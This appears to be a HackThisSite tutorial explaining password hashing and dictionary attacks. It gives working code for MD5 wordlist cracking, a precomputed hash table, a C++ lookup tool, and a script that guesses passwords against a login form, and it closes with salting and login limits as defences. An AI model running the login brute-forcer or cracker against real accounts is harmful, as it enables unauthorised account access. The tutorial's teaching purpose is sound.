Preface: I use code to illustrate a lot of concepts in this article, so to really get the most out of it you need to be able to read code. Most of the code will be in Python, but you don't necessarily need to know Python; as long as you know some programming language you should still be able to follow how the code works. Feel free to use the code provided in this article, just do not claim it as your own.
If you're reading this, then you should already know that passwords are hashed rather than stored in plain text, for security reasons. If not, here is a quick explanation. When you hash some text it goes through an algorithm that turns it into a hash, something like this: 49f68a5c8493ec2c0bf489821c21fc3b.
Hashing is a one-way operation, so you cannot unhash something. Instead, hashes are compared. When you create an account on a website, the password you enter is hashed and stored somewhere like a database. Then when you log in to something, like your HTS account, the password you enter is hashed and compared to the password hash associated with your user name. The code might look something like this.
CODE :
$passwd = md5($_POST['passwd']);
// $username and $password hold the stored user name and password hash
if ($uname == $username and $passwd == $password) {
    // the submitted password hashed to the stored hash: log the user in
}
So, you've got some hashes and are ready to get cracking. You have two main options: a dictionary attack and a brute-force attack. In this article I'll be explaining a dictionary attack and showing its inner workings with some code. Basically, in a dictionary attack you have a program read each word from a dictionary (also known as a wordlist or password list), hash it, and compare it to the hash you are trying to crack. A dictionary or wordlist is just a massive text file full of potential passwords. Now let me go more in depth with some code. In this example I will use the MD5 hashing algorithm, but the hashing algorithm may be changed to something else like SHA256, depending on what kind of hashes you have.
First of all you will need to import a hash library or code your own hashing functions.
CODE :
import hashlib
Then open your wordlist and read it into a variable.
CODE :
# ask the user which wordlist they would like to use
wlist = input('wordlist: ')
# open the dictionary/wordlist
file = open(wlist, 'r')
# read the whole wordlist file into a variable
wlst = file.read()
# the file is closed
file.close()
# separate each word and place it in a list
dictionary = wlst.split()
Now we loop through each word in our dictionary and compare it to the input hash.
CODE :
# npt holds the hash we are trying to crack; x is the loop counter
npt = input('hash: ').strip().lower()
x = 0
while x < len(dictionary):
    # hash each dictionary value (hashlib needs bytes in Python 3)
    hsh = hashlib.md5(dictionary[x].encode())
    # compare hashed values
    if hsh.hexdigest() == npt:
        # if the hashes match then the word is printed
        print('hash: ' + dictionary[x])
        break
    x += 1
The same technique can be applied to other things as well, like a login page: send a POST request for every dictionary word as the password, then check the HTML source of the response for an incorrect-password message. If the incorrect-password message is not returned for one of the passwords, then that password must have been correct. Most modern sites will be protected against this, but it illustrates how to apply dictionary attacks to something besides hash cracking. This attack does not target the hash itself; rather, it rapidly guesses passwords at the login page. Here is what some of the code may look like.
CODE :
import urllib.parse
import urllib.request

# url, user, POST_acc, POST_pass and fail (the site's incorrect-password text)
# are set earlier; dictionary is the wordlist loaded above
x = 0
while x < len(dictionary):
    post_data = urllib.parse.urlencode([(POST_acc, user), (POST_pass, dictionary[x])]).encode()
    req = urllib.request.Request(url, post_data)
    req.add_header("Content-type", "application/x-www-form-urlencoded")
    page = urllib.request.urlopen(req)
    html = page.read().decode(errors='ignore')
    page.close()
    # no failure message in the response means this word was the password
    if fail not in html:
        print('passwd: ' + dictionary[x])
        break
    x += 1
Now there is one small issue with the hash cracking method described above. When dealing with massive wordlists, time becomes more of a factor. The above method is a bit inefficient because it hashes every single word from the dictionary every time it is run. The solution: hash all of the words in a dictionary once and write them into a text file along with their unhashed versions. Now you can just read the hashes out of your text file and compare them, without having to hash each one every time the program is run. The easiest way to create our hash file is with a Python script.
CODE :
# dictionary is the wordlist loaded above; the hash file is read later by the C++ program
output_file = open('hashes.txt', 'w')
x = 0
while x < len(dictionary):
    hsh = hashlib.md5(dictionary[x].encode())
    hsh_value = hsh.hexdigest()
    # one line per word: the word, a space, and its MD5 hash
    output_file.write(dictionary[x] + ' ' + hsh_value + '\n')
    x += 1
output_file.close()
After running this script on a wordlist:
0racl3
0racl38
0racl38i
The output file will look like this:
0racl3 653cc577a829c9eb982fc75e9edc0f35
0racl38 f31f2dfd5b29ff0d22a89d0af77b80ac
0racl38i 6a12e06016de1b3eecd895e803bb8308
Another thing to consider while trying to improve the speed of our program is that Python is interpreted, so it is not as fast as a compiled language like C. Generally you will not notice a difference in speed, but when you are working with really huge dictionaries it could become an issue. So let's write our code in C++ to further improve performance.
CODE :
#include <fstream>
#include <iostream>
#include <string>
using namespace std;

int main(int argc, char* argv[]) {
    // the hash to look up is passed on the command line
    if (argc < 2) return 1;
    string target_hash = argv[1];
    ifstream list("hashes.txt");
    string data1, data2 = "1";
    // Read each word from the list, placing the unhashed word in the data1
    // variable and the corresponding hash value into data2
    while (list >> data1 >> data2) {
        if (data2 == target_hash) {
            cout << data1 << " " << data2 << endl;
        }
    }
    list.close();
    return 0;
}
Dictionary attacks can be prevented with the use of salt. Salting passwords refers to adding some extra random data to an entered password before it is hashed. Cracking a hash that has been salted not only requires guessing the password itself but also the salt, so you would have to loop through every possible salt for each of your dictionary words. Needless to say, it would make a dictionary or brute-force attack take so long (years) that it would be impractical.
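As an added example (not code from the original article), the following Python 3 script shows why salting defeats the precomputed hash file built above: a lookup table keyed by MD5 finds an unsalted password at once, but the same password stored with a random per-user salt never appears in that table, and the site still verifies logins by recomputing with the stored salt. The wordlist is the article's three sample words; the choice of SHA-256 for the salted hash and of a 16-byte salt is mine.

```python
import hashlib
import hmac
import os

# Constructed wordlist: the three words the article used for its hash file.
WORDLIST = ["0racl3", "0racl38", "0racl38i"]

def md5_hex(word):
    """MD5 of a word, as the article's hash-file script computes it."""
    return hashlib.md5(word.encode()).hexdigest()

def build_md5_table(words):
    """Precomputed table keyed by hash, i.e. the hash file loaded for lookup."""
    return {md5_hex(w): w for w in words}

def lookup(table, stored_hash):
    """One dictionary lookup recovers an unsalted password; None if absent."""
    return table.get(stored_hash)

def salted_hash(password, salt):
    """Hash the random per-user salt together with the password."""
    return hashlib.sha256(salt + password.encode()).hexdigest()

def store_password(password):
    """What a site keeps instead of a bare hash: (salt, salted hash)."""
    salt = os.urandom(16)  # fresh random salt for every account
    return salt, salted_hash(password, salt)

def verify_password(record, attempt):
    """Recompute with the stored salt and compare in constant time."""
    salt, stored = record
    return hmac.compare_digest(salted_hash(attempt, salt), stored)

if __name__ == "__main__":
    table = build_md5_table(WORDLIST)
    print("unsalted:", lookup(table, md5_hex("0racl38")))  # found at once
    record = store_password("0racl38")
    print("salted:", lookup(table, record[1]))              # None: no table hit
    print("login ok:", verify_password(record, "0racl38"))
```

Two users with the same password get different salts and therefore different stored hashes, so one cracked hash or one precomputed table no longer unlocks every account that shares that password.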
Conclusion: After reading this you should now have an understanding of how hashing and dictionary attacks work. Based on these concepts and the code provided above, you should be able to code your own custom dictionary attacks. There are plenty of tools out there for these kinds of attacks, but in certain situations you may need to code your own to accomplish a specific goal. Learning how these attacks work should also help you adopt more secure coding practices, like salting your passwords and limiting the number of login attempts allowed for a user.
-0phidian
HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.